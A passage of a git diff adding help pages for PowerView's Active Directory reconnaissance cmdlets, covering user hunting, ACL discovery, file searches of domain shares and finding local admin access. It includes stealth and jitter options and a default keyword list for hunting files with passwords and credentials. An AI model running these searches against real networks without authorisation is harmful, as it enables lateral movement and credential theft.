(All) +Aliases: Unconstrained + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Specifies one or more user identities to search for. + +```yaml +Type: String[] +Parameter Sets: UserIdentity +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserDomain +Specifies the domain to query for users to search for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserLDAPFilter +Specifies an LDAP query string that is used to search for target users. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserSearchBase +Specifies the LDAP source to search through for target users. +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserGroupIdentity +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +```yaml +Type: String[] +Parameter Sets: UserGroupIdentity +Aliases: GroupName, Group + +Required: False +Position: Named +Default value: Domain Admins +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAdminCount +Switch. +Search for users users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: AdminCount + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAllowDelegation +Switch. +Search for user accounts that are not marked as 'sensitive and not allowed for delegation'. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: AllowDelegation + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckAccess +Switch. +Check if the current user has local admin access to computers where target users are found. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StopOnSuccess +Switch. +Stop hunting after finding after finding a target user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ShowAll +Switch. +Return all user location results instead of filtering based on target +specifications. + +```yaml +Type: SwitchParameter +Parameter Sets: ShowAll +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Stealth +Switch. +Only enumerate sessions from connonly used target servers. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StealthSource +The source of target servers to use, 'DFS' (distributed file servers), +'DC' (domain controllers), 'File' (file servers), or 'All' (the default). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: All +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.UserLocation + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-InterestingDomainAcl.md b/docs/Recon/Find-InterestingDomainAcl.md new file mode 100755 index 00000000..eeda73a7 --- /dev/null +++ b/docs/Recon/Find-InterestingDomainAcl.md @@ -0,0 +1,239 @@ +# Find-InterestingDomainAcl + +## SYNOPSIS +Finds object ACLs in the current (or specified) domain with modification +rights set to non-built in objects. + +Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName + +## SYNTAX + +``` +Find-InterestingDomainAcl [[-Domain] ] [-ResolveGUIDs] [-RightsFilter ] [-LDAPFilter ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl, +and for each returned ACE entry it checks if principal security identifier +is *-1000 (meaning the account is not built in), and also checks if the rights for +the ACE mean the object can be modified by the principal. +If these conditions are met, +then the security identifier SID is translated, the domain object is retrieved, and +additional IdentityReference* information is appended to the output object. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-InterestingDomainAcl +``` + +Finds interesting object ACLS in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs +``` + +Finds interesting object ACLS in the ev.testlab.local domain and +resolves rights GUIDs to display names. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ResolveGUIDs +Switch. +Resolve GUIDs to their display names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RightsFilter +{{Fill RightsFilter Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ACL + +Custom PSObject with ACL entries. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-InterestingDomainShareFile.md b/docs/Recon/Find-InterestingDomainShareFile.md new file mode 100755 index 00000000..511510fa --- /dev/null +++ b/docs/Recon/Find-InterestingDomainShareFile.md @@ -0,0 +1,463 @@ +# Find-InterestingDomainShareFile + +## SYNOPSIS +Searches for files matching specific criteria on readable shares +in the domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction + +## SYNTAX + +### FileSpecification (Default) +``` +Find-InterestingDomainShareFile [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-Include ] [-SharePath ] + [-ExcludedShares ] [-LastAccessTime ] [-LastWriteTime ] + [-CreationTime ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-Delay ] [-Jitter ] + [-Threads ] +``` + +### OfficeDocs +``` +Find-InterestingDomainShareFile [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-SharePath ] + [-ExcludedShares ] [-OfficeDocs] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-Delay ] [-Jitter ] [-Threads ] +``` + +### FreshEXEs +``` +Find-InterestingDomainShareFile [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-SharePath ] + [-ExcludedShares ] [-FreshEXEs] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-Delay ] [-Jitter ] + [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. +It will then use Find-InterestingFile on each +readhable share, searching for files marching specific criteria. +If -Credential +is passed, then Invoke-UserImpersonation is used to impersonate the specified +user before enumeration, reverting after with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-InterestingDomainShareFile +``` + +Finds 'interesting' files on the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local') +``` + +Finds 'interesting' files on readable shares on the specified systems. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches interesting files in the testlab.local domain using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Include +Only return files/folders that match the specified array of strings, +i.e. +@(*.doc*, *.xls*, *.ppt*) + +```yaml +Type: String[] +Parameter Sets: FileSpecification +Aliases: SearchTerms, Terms + +Required: False +Position: Named +Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SharePath +Specifies one or more specific share paths to search, in the form \\\\COMPUTER\Share + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Share + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludedShares +Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: @('C$', 'Admin$', 'Print$', 'IPC$') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastAccessTime +Only return files with a LastAccessTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastWriteTime +Only return files with a LastWriteTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CreationTime +Only return files with a CreationTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OfficeDocs +Switch. +Search for office documents (*.doc*, *.xls*, *.ppt*) + +```yaml +Type: SwitchParameter +Parameter Sets: OfficeDocs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FreshEXEs +Switch. +Find .EXEs accessed within the last 7 days. + +```yaml +Type: SwitchParameter +Parameter Sets: FreshEXEs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.FoundFile + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-InterestingFile.md b/docs/Recon/Find-InterestingFile.md new file mode 100755 index 00000000..2fe6abfc --- /dev/null +++ b/docs/Recon/Find-InterestingFile.md @@ -0,0 +1,248 @@ +# Find-InterestingFile + +## SYNOPSIS +Searches for files on the given path that match a series of specified criteria. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection + +## SYNTAX + +### FileSpecification (Default) +``` +Find-InterestingFile [[-Path] ] [-Include ] [-LastAccessTime ] + [-LastWriteTime ] [-CreationTime ] [-ExcludeFolders] [-ExcludeHidden] [-CheckWriteAccess] + [-Credential ] +``` + +### OfficeDocs +``` +Find-InterestingFile [[-Path] ] [-OfficeDocs] [-CheckWriteAccess] [-Credential ] +``` + +### FreshEXEs +``` +Find-InterestingFile [[-Path] ] [-FreshEXEs] [-CheckWriteAccess] [-Credential ] +``` + +## DESCRIPTION +This function recursively searches a given UNC path for files with +specific keywords in the name (default of pass, sensitive, secret, admin, +login and unattend*.xml). +By default, hidden files/folders are included +in search results. +If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection +is used to temporarily map the remote share. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-InterestingFile -Path "C:\Backup\" +``` + +Returns any files on the local path C:\Backup\ that have the default +search term set in the title. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7) +``` + +Returns any files on the remote path \\\\WINDOWS7\Users\ that have the default +search term set in the title and were accessed within the last week. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingFile -Credential $Cred -Path "\\\\PRIMARY.testlab.local\C$\Temp\" + +## PARAMETERS + +### -Path +UNC/local path to recursively search. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: .\ +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Include +Only return files/folders that match the specified array of strings, +i.e. +@(*.doc*, *.xls*, *.ppt*) + +```yaml +Type: String[] +Parameter Sets: FileSpecification +Aliases: SearchTerms, Terms + +Required: False +Position: Named +Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastAccessTime +Only return files with a LastAccessTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LastWriteTime +Only return files with a LastWriteTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CreationTime +Only return files with a CreationTime greater than this date value. + +```yaml +Type: DateTime +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OfficeDocs +Switch. +Search for office documents (*.doc*, *.xls*, *.ppt*) + +```yaml +Type: SwitchParameter +Parameter Sets: OfficeDocs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FreshEXEs +Switch. +Find .EXEs accessed within the last 7 days. + +```yaml +Type: SwitchParameter +Parameter Sets: FreshEXEs +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeFolders +Switch. +Exclude folders from the search results. + +```yaml +Type: SwitchParameter +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ExcludeHidden +Switch. +Exclude hidden files and folders from the search results. + +```yaml +Type: SwitchParameter +Parameter Sets: FileSpecification +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckWriteAccess +Switch. +Only returns files the current user has write access to. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +to connect to remote systems for file enumeration. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.FoundFile + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-LocalAdminAccess.md b/docs/Recon/Find-LocalAdminAccess.md new file mode 100755 index 00000000..f3e3b6f3 --- /dev/null +++ b/docs/Recon/Find-LocalAdminAccess.md @@ -0,0 +1,337 @@ +# Find-LocalAdminAccess + +## SYNOPSIS +Finds machines on the local domain where the current user has local administrator access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction + +## SYNTAX + +``` +Find-LocalAdminAccess [[-ComputerName] ] [-ComputerDomain ] [-ComputerLDAPFilter ] + [-ComputerSearchBase ] [-ComputerOperatingSystem ] [-ComputerServicePack ] + [-ComputerSiteName ] [-CheckShareAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and for each computer it checks if the current user +has local administrator access using Test-AdminAccess. +If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. + +Idea adapted from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" \' + 'Thomas McCarthy "smilingraccoon" \' + 'Royce Davis "r3dy" \' + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-LocalAdminAccess +``` + +Finds machines in the current domain the current user has admin access to. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-LocalAdminAccess -Domain dev.testlab.local +``` + +Finds machines in the dev.testlab.local domain the current user has admin access to. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-LocalAdminAccess -Domain testlab.local -Credential $Cred + +Finds machines in the testlab.local domain that the user with the specified -Credential +has admin access to. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckShareAccess +Switch. +Only display found shares that the local user has access to. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay 